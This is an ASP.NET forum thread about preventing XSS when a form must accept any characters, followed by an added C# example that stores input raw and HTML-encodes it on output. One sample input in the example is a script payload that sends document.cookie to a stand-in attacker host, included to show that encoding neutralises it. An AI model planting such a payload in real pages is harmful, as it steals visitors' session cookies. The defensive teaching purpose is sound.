html and script tags in forms encoding etc..

  • Question

  • User1925756237 posted

    I have a form where any characters are acceptable input. Obviously this leaves me vulnerable to XSS attacks. I know there are a few options such as making sure ValidateRequest is set to true on my ASP.NET pages, and/or using the HTML encode utility. If I do this however I won't be able to get the form to submit since I get the "a dangerous request...." error due to the characters I am allowing to be input. The problem I have is I don't necessarily want encoded data input into my MSSQL database for a variety of reasons. The main reason is displaying the data and/or decoding the data through ad hocs and SRS reports is not easy.

    My question is what is the best way to handle the above situation?

    Wednesday, April 3, 2013 1:52 PM

Answers

  • User-1241139641 posted

    It won't show as encoded to the person viewing the page. It will display special characters like '<' and '>' as is.

    Response.Write(Server.HtmlEncode("<b>This is HTML!</b>")); // writes &lt;b&gt;This is HTML!&lt;/b&gt; into the response, which the browser shows as the text <b>This is HTML!</b> on the page.



    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Friday, April 5, 2013 12:07 PM

All replies

  • User-1241139641 posted

    If you need to turn ValidateRequest off then what you need to do is 'HtmlEncode' the string when you return the value back to browser. This will ensure that any script or html is displayed as text not processed by the browser.

    But again, this is not recommended unless you have to: http://msdn.microsoft.com/en-us/library/system.web.ui.page.enableeventvalidation.aspx

    Friday, April 5, 2013 9:00 AM
  • User1925756237 posted

    I don't think that will work, because let's say I accept characters such as < or & etc. If I save to the database as those characters un-encoded, then encode them to the screen, they will see a bunch of encoding characters and not the original text.

    Friday, April 5, 2013 11:46 AM
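The approach the replies above describe (store what the user typed, encode once at the point where it is written into HTML, and only turn request validation off where you must), as an added example that is not code from the thread. It is a stand-alone C# console program: System.Net.WebUtility.HtmlEncode does the same job as Server.HtmlEncode but runs outside ASP.NET, so the round trip can be checked without a web project. The in-memory Store list standing in for the MSSQL table and the two sample inputs are constructed for the demo.

```csharp
using System;
using System.Collections.Generic;
using System.Net;

// Added example, not from the thread: keep stored data raw, encode once when rendering.
class EncodeOnOutputDemo
{
    // Stands in for the MSSQL table (constructed for the demo): text is stored exactly as typed,
    // so ad hoc queries and SRS reports see the real characters, not entity references.
    static readonly List<string> Store = new List<string>();

    // Receives the raw form field (request validation already turned off for this input).
    static void Save(string rawInput)
    {
        Store.Add(rawInput); // no encoding on the way in
    }

    // The ONLY place encoding happens: when the value is written into an HTML element body.
    static string RenderAsText(string stored)
    {
        return WebUtility.HtmlEncode(stored);
    }

    // Attribute values must be both quoted and encoded; HtmlEncode also covers " and '.
    static string RenderAsAttribute(string stored)
    {
        return "value=\"" + WebUtility.HtmlEncode(stored) + "\"";
    }

    static void Main()
    {
        // Constructed sample inputs: ordinary text with symbols, and an XSS attempt.
        Save("Tom & Jerry < Road Runner");
        Save("<script>document.location='http://evil.example/?c='+document.cookie</script>");

        foreach (string stored in Store)
        {
            string html = RenderAsText(stored);
            Console.WriteLine("stored   : " + stored);
            Console.WriteLine("html     : " + html);
            // The browser turns &lt; &gt; &amp; &#39; back into < > & ' when it paints the page,
            // so the reader sees the original text and the <script> is never executed.
            Console.WriteLine("shown    : " + WebUtility.HtmlDecode(html));
            Console.WriteLine("lossless : " + (WebUtility.HtmlDecode(html) == stored));
            Console.WriteLine("attr     : " + RenderAsAttribute(stored));
            Console.WriteLine();
        }

        // The failure mode the question worried about: it only appears if the data is
        // stored ALREADY encoded and then encoded a second time on output.
        string storedEncoded = WebUtility.HtmlEncode("a < b");      // "a &lt; b" in the database
        string doubleEncoded = WebUtility.HtmlEncode(storedEncoded); // "a &amp;lt; b"
        Console.WriteLine("double-encoded : " + doubleEncoded);
        Console.WriteLine("reader sees    : " + WebUtility.HtmlDecode(doubleEncoded)); // a &lt; b
    }
}
```

Two caveats a practitioner will want alongside this. HtmlEncode is the right encoder for an element body or a quoted attribute value; a value dropped into a JavaScript string, a URL, or CSS needs the encoder for that context instead (for example HttpUtility.JavaScriptStringEncode or UrlEncode), and in Web Forms the `<%: value %>` syntax encodes automatically where `<%= value %>` does not. And on ASP.NET 4.0 and later, `ValidateRequest="false"` in the @Page directive only takes effect with `<httpRuntime requestValidationMode="2.0" />` in web.config; ASP.NET 4.5 adds `Request.Unvalidated`, which lets you read just the one permissive field without disabling validation for the whole page.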